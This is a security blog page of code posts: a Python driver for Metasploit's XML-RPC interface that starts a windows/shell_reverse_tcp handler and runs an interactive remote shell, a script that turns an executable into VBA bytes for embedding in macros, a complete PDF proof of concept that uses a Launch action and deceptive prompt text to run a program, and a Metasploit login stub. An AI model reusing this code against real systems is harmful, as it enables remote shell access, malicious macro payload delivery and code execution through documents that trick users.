Wednesday, June 16, 2010

python metasploit xmlrpc interface 1.0 


#!/usr/bin/python

import xmlrpclib
class MSFTransport(xmlrpclib.Transport):
    """Handles an transaction to the MetasploitXML-RPC server."""

    # client identifier (may be overridden)
    def __init__(self, use_datetime=0):
        self._use_datetime = use_datetime
    def request(self, host, handler, request_body, verbose=0):
        # issue XML-RPC request
        c = self.make_connection(host)
        if verbose:
            h.set_debuglevel(1)
        self.send_content(c, request_body)
        self.verbose = verbose
        return self._parse_response(None, c)

    def make_connection(self, host):
        import socket
        addr = host.split(":")
        inetaddr = (addr[0],int(addr[1]))
        c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        c.connect(inetaddr)
        return c
    def send_content(self, connection, request_body):
        if request_body:
            connection.send(request_body + "\0")
    def _parse_response(self, file, sock):
        # read response from input file/socket, and parse it
        p, u = self.getparser()
        while 1:
            if sock:
                response = sock.recv(1024)
            else:
                response = file.read(1024)
            if not response:
                break
            if response.endswith("\0")  :
                response = response.rstrip("\0\n")
                p.feed(response.encode("utf-8"))
                break;
            else:
                p.feed(response.encode("utf-8"))

        if file:
                file.close()
        p.close()

        return u.close()
################################
from time import sleep
import base64
import xmlrpclib
#import MSFTransport
msftransport = MSFTransport()
proxy = xmlrpclib.ServerProxy("http://127.0.0.1:55553", transport=msftransport)

ret = proxy.auth.login("msf","test")
if ret['result'] == 'success':
        token = ret['token']
else:
        print "Could not login\n"

opts = {
        "RHOST" : "192.168.1.1",
        "LHOST" : "127.0.0.1",
        "LPORT" : 4444,
        "PAYLOAD": "windows/shell_reverse_tcp"}
print "Running exploit now"
ret = proxy.module.execute(token,"exploit","multi/handler",opts)
if(ret['result'] == 'success'):
        print "Exploit sucessful...waiting on session"
sleep(25)
session_list =  proxy.session.list(token)
x = session_list.keys()

def s_io(s):
        while 1:
         w = raw_input("shell> ")
         if w == "exit":
                break
         write = w + "\n"
         n = proxy.session.shell_write(token,s,base64.b64encode(write))
         read = proxy.session.shell_read(token,s)
         print  base64.b64decode(read['data'])

if session_list != {} and session_list[x[0]]['type'] == 'shell':
        s =  int(x[0])
        s_io(s)
Posted by at No comments:

Friday, April 30, 2010

exe2vba.py

import struct
import os
import binascii
import win32com.client
import time

idx = 0
n = 0
maxbytes = 2000
payload_vba_file = "payload.vba"

exe_name = "putty.exe"
size = os.path.getsize(exe_name)
exe = open(exe_name)
final_bytes = ""
print "Writing Document ",
while (idx < size):
exe.seek(idx)
c = binascii.b2a_hex(exe.read(1))
# print ("&H%2s" % c.upper()),
exe_byte = ("&H%2s" % c.upper())
final_bytes = final_bytes +exe_byte
idx = idx + 1
if (idx%2000 == 0):
print "\bX\b",
time.sleep(.1)
if (idx%2000 == 1000):
print "\bO\b",
time.sleep(.1)
print final_bytes
fh = open(payload_vba_file,'w')
fh.write(final_bytes)
fh.close()
Posted by at No comments:

Wednesday, March 31, 2010

PDF execute code w/o javascript

example code from http://blog.didierstevens.com/2010/03/29/escape-from-pdf/

%PDF-1.1

1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj

2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj

3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj

4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hello World)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (calc.exe)
/P (\nTo continue viewing the encrypted content\nplease click the “Don’t show this message again” box\nand press OK!)
>>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF
Posted by at No comments:

Friday, December 04, 2009

metasploit xmlrpc stub

# xmlrpc interface to metasploit

import xmlrpclib
import socket
import telnetlib
from xml.dom import minidom

tn = telnetlib.Telnet("127.0.0.1",55553)
s = tn.get_socket()

params = ( 'msf', 'test' )
tuple_params = tuple([params])

xmlrpccall = xmlrpclib.dumps(params, 'auth.login',None,'UTF-8')
i = xmlrpccall.replace('\n','')

tn.write(i+"\n\0")
data = s.recv(2048)

data = data.replace('\n\0','')
#print data
n = minidom.parseString(data)


print n.toxml()
print n.childNodes[0].toxml()
print n.childNodes[0].childNodes[0].childNodes[0].childNodes[0].childNodes[0].childNodes[1].childNodes[1].childNodes[0].firstChild.data
Posted by at No comments:
Subscribe to: Posts (Atom)